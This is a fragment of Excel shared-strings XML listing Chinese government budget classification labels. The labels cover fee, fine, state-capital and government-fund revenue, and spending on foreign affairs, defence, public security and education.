  <si>
    <t xml:space="preserve">    组织事务</t>
  </si>
  <si>
    <t xml:space="preserve">      教育行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      体育行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      发展与改革(物价)行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      统计行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      公务员事务</t>
  </si>
  <si>
    <t xml:space="preserve">      自然资源行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">        其中：耕地开垦费</t>
  </si>
  <si>
    <t xml:space="preserve">      其他组织事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      建设行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    宣传事务</t>
  </si>
  <si>
    <t xml:space="preserve">      知识产权行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">        其中：商标注册收费</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      宣传管理</t>
  </si>
  <si>
    <t xml:space="preserve">      交通运输行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">        其中：长江口航道维护费</t>
  </si>
  <si>
    <t xml:space="preserve">      其他宣传事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      工业和信息产业行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    统战事务</t>
  </si>
  <si>
    <t xml:space="preserve">        其中：无线电频率占用费</t>
  </si>
  <si>
    <t xml:space="preserve">      农业农村行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      林业草原行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">        其中：草原植被恢复费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      宗教事务</t>
  </si>
  <si>
    <t xml:space="preserve">      水利行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      华侨事务</t>
  </si>
  <si>
    <t xml:space="preserve">        其中：水土保持补偿费</t>
  </si>
  <si>
    <t xml:space="preserve">      卫生健康行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他统战事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      药品监管行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    对外联络事务</t>
  </si>
  <si>
    <t xml:space="preserve">      民政行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      人力资源和社会保障行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      证监会行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      银行保险行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      仲裁委行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他对外联络事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      编办行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他共产党事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      党校行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      监察行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      外文局行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国资委行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他行政事业性收费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他共产党事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">    网信事务</t>
  </si>
  <si>
    <t xml:space="preserve">      一般罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        公安罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        检察院罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        法院罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      信息安全事务</t>
  </si>
  <si>
    <t xml:space="preserve">        新闻出版罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        税务部门罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他网信事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">        海关罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">    市场监督管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">        药品监督罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        卫生罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        检验检疫罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        证监会罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      市场主体管理</t>
  </si>
  <si>
    <t xml:space="preserve">        银行保险罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      市场秩序执法</t>
  </si>
  <si>
    <t xml:space="preserve">        交通罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        铁道罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      质量基础</t>
  </si>
  <si>
    <t xml:space="preserve">        审计罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      药品事务</t>
  </si>
  <si>
    <t xml:space="preserve">        渔政罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      医疗器械事务</t>
  </si>
  <si>
    <t xml:space="preserve">        民航罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      化妆品事务</t>
  </si>
  <si>
    <t xml:space="preserve">        电力监管罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      质量安全监管</t>
  </si>
  <si>
    <t xml:space="preserve">        交强险罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      食品安全监管</t>
  </si>
  <si>
    <t xml:space="preserve">        物价罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">        市场监管罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他市场监督管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">        工业和信息产业罚没收入 </t>
  </si>
  <si>
    <t xml:space="preserve">    其他一般公共服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">        生态环境罚没收入 </t>
  </si>
  <si>
    <t xml:space="preserve">      国家赔偿费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">        水利罚没收入 </t>
  </si>
  <si>
    <t xml:space="preserve">      其他一般公共服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">        其他一般罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">  外交支出</t>
  </si>
  <si>
    <t xml:space="preserve">      缉私罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">    外交管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      缉毒罚没收入</t>
  </si>
  <si>
    <t xml:space="preserve">      罚没收入退库</t>
  </si>
  <si>
    <t xml:space="preserve">    国有资本经营收入</t>
  </si>
  <si>
    <t xml:space="preserve">      利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">          中国人民银行上缴收入</t>
  </si>
  <si>
    <t xml:space="preserve">          金融企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他外交管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">          其他企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    驻外机构</t>
  </si>
  <si>
    <t xml:space="preserve">      股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      驻外使领馆(团、处)</t>
  </si>
  <si>
    <t xml:space="preserve">          金融业公司股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他驻外机构支出</t>
  </si>
  <si>
    <t xml:space="preserve">          其他股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">    对外援助</t>
  </si>
  <si>
    <t xml:space="preserve">      产权转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">      援外优惠贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">          其他产权转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">      对外援助</t>
  </si>
  <si>
    <t xml:space="preserve">      清算收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国际组织</t>
  </si>
  <si>
    <t xml:space="preserve">          其他清算收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国际组织会费</t>
  </si>
  <si>
    <t xml:space="preserve">      国有资本经营收入退库</t>
  </si>
  <si>
    <t xml:space="preserve">      国际组织捐赠</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业计划亏损补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      维和摊款</t>
  </si>
  <si>
    <t xml:space="preserve">          工业企业计划亏损补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      国际组织股金及基金</t>
  </si>
  <si>
    <t xml:space="preserve">          农业企业计划亏损补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国际组织支出</t>
  </si>
  <si>
    <t xml:space="preserve">          其他国有企业计划亏损补贴</t>
  </si>
  <si>
    <t xml:space="preserve">    对外合作与交流</t>
  </si>
  <si>
    <t xml:space="preserve">      烟草企业上缴专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      在华国际会议</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有资本经营收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国际交流活动</t>
  </si>
  <si>
    <t xml:space="preserve">    国有资源(资产)有偿使用收入</t>
  </si>
  <si>
    <t xml:space="preserve">      对外合作活动</t>
  </si>
  <si>
    <t xml:space="preserve">      海域使用金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他对外合作与交流支出</t>
  </si>
  <si>
    <t xml:space="preserve">      场地和矿区使用费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    对外宣传</t>
  </si>
  <si>
    <t xml:space="preserve">      特种矿产品出售收入</t>
  </si>
  <si>
    <t xml:space="preserve">      对外宣传</t>
  </si>
  <si>
    <t xml:space="preserve">      专项储备物资销售收入</t>
  </si>
  <si>
    <t xml:space="preserve">    边界勘界联检</t>
  </si>
  <si>
    <t xml:space="preserve">      利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      边界勘界</t>
  </si>
  <si>
    <t xml:space="preserve">          国库存款利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      边界联检</t>
  </si>
  <si>
    <t xml:space="preserve">          财政专户存款利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      边界界桩维护</t>
  </si>
  <si>
    <t xml:space="preserve">          有价证券利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他支出</t>
  </si>
  <si>
    <t xml:space="preserve">          其他利息收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国际发展合作</t>
  </si>
  <si>
    <t xml:space="preserve">      非经营性国有资产收入</t>
  </si>
  <si>
    <t xml:space="preserve">      出租车经营权有偿出让和转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">      无居民海岛使用金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      转让政府还贷道路收费权收入</t>
  </si>
  <si>
    <t xml:space="preserve">      石油特别收益金专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国际发展合作支出</t>
  </si>
  <si>
    <t xml:space="preserve">          石油特别收益金专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他外交支出</t>
  </si>
  <si>
    <t xml:space="preserve">          石油特别收益金退库</t>
  </si>
  <si>
    <t xml:space="preserve">      其他外交支出</t>
  </si>
  <si>
    <t xml:space="preserve">      动用国家储备物资上缴财政收入</t>
  </si>
  <si>
    <t xml:space="preserve">  国防支出</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路资产变现收入</t>
  </si>
  <si>
    <t xml:space="preserve">    现役部队</t>
  </si>
  <si>
    <t xml:space="preserve">      电力改革预留资产变现收入</t>
  </si>
  <si>
    <t xml:space="preserve">      现役部队</t>
  </si>
  <si>
    <t xml:space="preserve">      矿产资源专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国防科研事业</t>
  </si>
  <si>
    <t xml:space="preserve">          矿产资源补偿费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国防科研事业</t>
  </si>
  <si>
    <t xml:space="preserve">          探矿权、采矿权使用费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    专项工程</t>
  </si>
  <si>
    <t xml:space="preserve">          矿业权出让收益</t>
  </si>
  <si>
    <t xml:space="preserve">      专项工程</t>
  </si>
  <si>
    <t xml:space="preserve">          矿业权占用费收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国防动员</t>
  </si>
  <si>
    <t xml:space="preserve">      排污权出让收入</t>
  </si>
  <si>
    <t xml:space="preserve">      兵役征集</t>
  </si>
  <si>
    <t xml:space="preserve">      航班时刻拍卖和使用费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      经济动员</t>
  </si>
  <si>
    <t xml:space="preserve">      农村集体经营性建设用地土地增值收益调节金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      人民防空</t>
  </si>
  <si>
    <t>1030718</t>
  </si>
  <si>
    <t xml:space="preserve">      新增建设用地土地有偿使用费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      交通战备</t>
  </si>
  <si>
    <t>1030719</t>
  </si>
  <si>
    <t xml:space="preserve">      水资源费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国防教育</t>
  </si>
  <si>
    <t>103071901</t>
  </si>
  <si>
    <t xml:space="preserve">          三峡电站水资源费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      预备役部队</t>
  </si>
  <si>
    <t>103071999</t>
  </si>
  <si>
    <t xml:space="preserve">          其他水资源费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      民兵</t>
  </si>
  <si>
    <t>1030720</t>
  </si>
  <si>
    <t xml:space="preserve">      国家留成油上缴收入</t>
  </si>
  <si>
    <t xml:space="preserve">      边海防</t>
  </si>
  <si>
    <t xml:space="preserve">      市政公共资源有偿使用收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国防动员支出</t>
  </si>
  <si>
    <t xml:space="preserve">          停车泊位及公共停车场等有偿使用收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他国防支出</t>
  </si>
  <si>
    <t xml:space="preserve">          公共空间广告设置权等有偿使用收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国防支出</t>
  </si>
  <si>
    <t xml:space="preserve">          其他市政公共资源有偿使用收入</t>
  </si>
  <si>
    <t xml:space="preserve">  公共安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有资源(资产)有偿使用收入</t>
  </si>
  <si>
    <t xml:space="preserve">    武装警察部队</t>
  </si>
  <si>
    <t xml:space="preserve">    捐赠收入</t>
  </si>
  <si>
    <t xml:space="preserve">      武装警察部队</t>
  </si>
  <si>
    <t xml:space="preserve">       国外捐赠收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他武装警察部队支出</t>
  </si>
  <si>
    <t xml:space="preserve">       国内捐赠收入</t>
  </si>
  <si>
    <t xml:space="preserve">    公安</t>
  </si>
  <si>
    <t xml:space="preserve">    政府住房基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">       上缴管理费用</t>
  </si>
  <si>
    <t xml:space="preserve">       计提公共租赁住房资金</t>
  </si>
  <si>
    <t xml:space="preserve">       公共租赁住房租金收入</t>
  </si>
  <si>
    <t xml:space="preserve">       配建商业设施租售收入</t>
  </si>
  <si>
    <t xml:space="preserve">      执法办案</t>
  </si>
  <si>
    <t xml:space="preserve">       其他政府住房基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      特别业务</t>
  </si>
  <si>
    <t xml:space="preserve">    其他收入</t>
  </si>
  <si>
    <t xml:space="preserve">      特勤业务</t>
  </si>
  <si>
    <t xml:space="preserve">      主管部门集中收入</t>
  </si>
  <si>
    <t xml:space="preserve">      移民事务</t>
  </si>
  <si>
    <t xml:space="preserve">      免税商品特许经营费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      基本建设收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公安支出</t>
  </si>
  <si>
    <t xml:space="preserve">      差别电价收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国家安全</t>
  </si>
  <si>
    <t xml:space="preserve">      债务管理收入</t>
  </si>
  <si>
    <t xml:space="preserve">      南水北调工程基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境损害赔偿资金</t>
  </si>
  <si>
    <t xml:space="preserve">      其他收入</t>
  </si>
  <si>
    <t xml:space="preserve">      安全业务</t>
  </si>
  <si>
    <t>政府性基金预算收入合计</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国家安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">  政府性基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">    检察</t>
  </si>
  <si>
    <t xml:space="preserve">     农网还贷资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     铁路建设基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     民航发展基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     海南省高等级公路车辆通行附加费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      “两房”建设</t>
  </si>
  <si>
    <t xml:space="preserve">     港口建设费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      检察监督</t>
  </si>
  <si>
    <t xml:space="preserve">     旅游发展基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     国家电影事业发展专项资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他检察支出</t>
  </si>
  <si>
    <t xml:space="preserve">     国有土地收益基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">    法院</t>
  </si>
  <si>
    <t xml:space="preserve">     农业土地开发资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     国有土地使用权出让收入</t>
  </si>
  <si>
    <t xml:space="preserve">        土地出让价款收入</t>
  </si>
  <si>
    <t xml:space="preserve">        补缴的土地价款</t>
  </si>
  <si>
    <t xml:space="preserve">      案件审判</t>
  </si>
  <si>
    <t xml:space="preserve">        划拨土地收入</t>
  </si>
  <si>
    <t xml:space="preserve">      案件执行</t>
  </si>
  <si>
    <t xml:space="preserve">        缴纳新增建设用地土地有偿使用费</t>
  </si>
  <si>
    <t xml:space="preserve">      “两庭”建设</t>
  </si>
  <si>
    <t xml:space="preserve">        其他土地出让收入</t>
  </si>
  <si>
    <t xml:space="preserve">     大中型水库移民后期扶持基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他法院支出</t>
  </si>
  <si>
    <t xml:space="preserve">     大中型水库库区基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">    司法</t>
  </si>
  <si>
    <t xml:space="preserve">     三峡水库库区基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     中央特别国债经营基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     中央特别国债经营基金财务收入</t>
  </si>
  <si>
    <t xml:space="preserve">     彩票公益金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      基层司法业务</t>
  </si>
  <si>
    <t xml:space="preserve">         福利彩票公益金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      普法宣传</t>
  </si>
  <si>
    <t xml:space="preserve">         体育彩票公益金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      律师管理</t>
  </si>
  <si>
    <t xml:space="preserve">     城市基础设施配套费收入</t>
  </si>
  <si>
    <t xml:space="preserve">      公共法律服务</t>
  </si>
  <si>
    <t xml:space="preserve">     小型水库移民扶助基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国家统一法律职业资格考试</t>
  </si>
  <si>
    <t xml:space="preserve">     国家重大水利工程建设基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      社区矫正</t>
  </si>
  <si>
    <t xml:space="preserve">         中央重大水利工程建设资金</t>
  </si>
  <si>
    <t xml:space="preserve">      法制建设</t>
  </si>
  <si>
    <t xml:space="preserve">         地方重大水利工程建设资金</t>
  </si>
  <si>
    <t xml:space="preserve">     车辆通行费</t>
  </si>
  <si>
    <t xml:space="preserve">     核电站乏燃料处理处置基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他司法支出</t>
  </si>
  <si>
    <t xml:space="preserve">     可再生能源电价附加收入</t>
  </si>
  <si>
    <t xml:space="preserve">    监狱</t>
  </si>
  <si>
    <t xml:space="preserve">     船舶油污损害赔偿基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     废弃电器电子产品处理基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     污水处理费收入</t>
  </si>
  <si>
    <t xml:space="preserve">     彩票发行机构和彩票销售机构的业务费用</t>
  </si>
  <si>
    <t xml:space="preserve">      犯人生活</t>
  </si>
  <si>
    <t xml:space="preserve">         福利彩票发行机构的业务费用</t>
  </si>
  <si>
    <t xml:space="preserve">      犯人改造</t>
  </si>
  <si>
    <t xml:space="preserve">         体育彩票发行机构的业务费用</t>
  </si>
  <si>
    <t xml:space="preserve">      狱政设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">         福利彩票销售机构的业务费用</t>
  </si>
  <si>
    <t xml:space="preserve">         体育彩票销售机构的业务费用</t>
  </si>
  <si>
    <t xml:space="preserve">         彩票兑奖周转金</t>
  </si>
  <si>
    <t xml:space="preserve">      其他监狱支出</t>
  </si>
  <si>
    <t xml:space="preserve">         彩票发行销售风险基金</t>
  </si>
  <si>
    <t xml:space="preserve">    强制隔离戒毒</t>
  </si>
  <si>
    <t xml:space="preserve">         彩票市场调控资金收入</t>
  </si>
  <si>
    <t xml:space="preserve">     其他政府性基金收入</t>
  </si>
  <si>
    <t xml:space="preserve">  专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">     海南省高等级公路车辆通行附加费专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      强制隔离戒毒人员生活</t>
  </si>
  <si>
    <t xml:space="preserve">     港口建设费专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      强制隔离戒毒人员教育</t>
  </si>
  <si>
    <t xml:space="preserve">     国家电影事业发展专项资金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      所政设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">     国有土地使用权出让金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">         土地储备专项债券对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">         棚户区改造专项债券对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他强制隔离戒毒支出</t>
  </si>
  <si>
    <t xml:space="preserve">         其他国有土地使用权出让金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">    国家保密</t>
  </si>
  <si>
    <t xml:space="preserve">     农业土地开发资金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">     大中型水库库区基金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">     城市基础设施配套费专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">     小型水库移民扶助基金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      保密技术</t>
  </si>
  <si>
    <t xml:space="preserve">     国家重大水利工程建设基金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      保密管理</t>
  </si>
  <si>
    <t xml:space="preserve">     车辆通行费专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">         政府收费公路专项债券对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国家保密支出</t>
  </si>
  <si>
    <t xml:space="preserve">         其他车辆通行费专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">    缉私警察</t>
  </si>
  <si>
    <t xml:space="preserve">     污水处理费专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">     其他政府性基金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">         其他地方自行试点项目收益专项债券对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">         其他政府性基金专项债务对应项目专项收入</t>
  </si>
  <si>
    <t xml:space="preserve">      缉私业务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他缉私警察支出</t>
  </si>
  <si>
    <t>国有资本经营预算收入合计</t>
  </si>
  <si>
    <t xml:space="preserve">    其他公共安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">  利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      国家司法救助支出</t>
  </si>
  <si>
    <t xml:space="preserve">     烟草企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公共安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">     石油石化企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">  教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">     电力企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    教育管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">     电信企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">     煤炭企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">     有色冶金采掘企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">     钢铁企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他教育管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">     化工企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    普通教育</t>
  </si>
  <si>
    <t xml:space="preserve">     运输企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      学前教育</t>
  </si>
  <si>
    <t xml:space="preserve">     电子企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      小学教育</t>
  </si>
  <si>
    <t xml:space="preserve">     机械企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      初中教育</t>
  </si>
  <si>
    <t xml:space="preserve">     投资服务企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      高中教育</t>
  </si>
  <si>
    <t xml:space="preserve">     纺织轻工企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      高等教育</t>
  </si>
  <si>
    <t xml:space="preserve">     贸易企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他普通教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">     建筑施工企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    职业教育</t>
  </si>
  <si>
    <t xml:space="preserve">     房地产企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      初等职业教育</t>
  </si>
  <si>
    <t xml:space="preserve">     建材企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      中等职业教育</t>
  </si>
  <si>
    <t xml:space="preserve">     境外企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      技校教育</t>
  </si>
  <si>
    <t xml:space="preserve">     对外合作企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      高等职业教育</t>
  </si>
  <si>
    <t xml:space="preserve">     医药企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他职业教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">     农林牧渔企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    成人教育</t>
  </si>
  <si>
    <t xml:space="preserve">     邮政企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      成人初等教育</t>
  </si>
  <si>
    <t xml:space="preserve">     军工企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      成人中等教育</t>
  </si>
  <si>
    <t xml:space="preserve">     转制科研院所利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      成人高等教育</t>
  </si>
  <si>
    <t xml:space="preserve">     地质勘查企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      成人广播电视教育</t>
  </si>
  <si>
    <t xml:space="preserve">     卫生体育福利企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他成人教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">     教育文化广播企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    广播电视教育</t>
  </si>
  <si>
    <t xml:space="preserve">     科学研究企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      广播电视学校</t>
  </si>
  <si>
    <t xml:space="preserve">     机关社团所属企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">      教育电视台</t>
  </si>
  <si>
    <t xml:space="preserve">     金融企业利润收入(国资预算)</t>
  </si>
  <si>
    <t xml:space="preserve">      其他广播电视教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">     其他国有资本经营预算企业利润收入</t>
  </si>
  <si>
    <t xml:space="preserve">    留学教育</t>
  </si>
  <si>
    <t xml:space="preserve">  股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      出国留学教育</t>
  </si>
  <si>
    <t xml:space="preserve">     国有控股公司股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      来华留学教育</t>
  </si>
  <si>
    <t xml:space="preserve">     国有参股公司股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他留学教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">     金融企业股利、股息收入(国资预算)</t>
  </si>
  <si>
    <t xml:space="preserve">    特殊教育</t>
  </si>
  <si>
    <t xml:space="preserve">     其他国有资本经营预算企业股利、股息收入</t>
  </si>
  <si>
    <t xml:space="preserve">      特殊学校教育</t>
  </si>
  <si>
    <t xml:space="preserve">  产权转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">      工读学校教育</t>
  </si>
  <si>
    <t xml:space="preserve">     国有股减持收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他特殊教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">     国有股权、股份转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">    进修及培训</t>
  </si>
  <si>
    <t xml:space="preserve">     国有独资企业产权转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">      教师进修</t>
  </si>
  <si>
    <t xml:space="preserve">     金融企业产权转让收入</t>
  </si>
  <si>
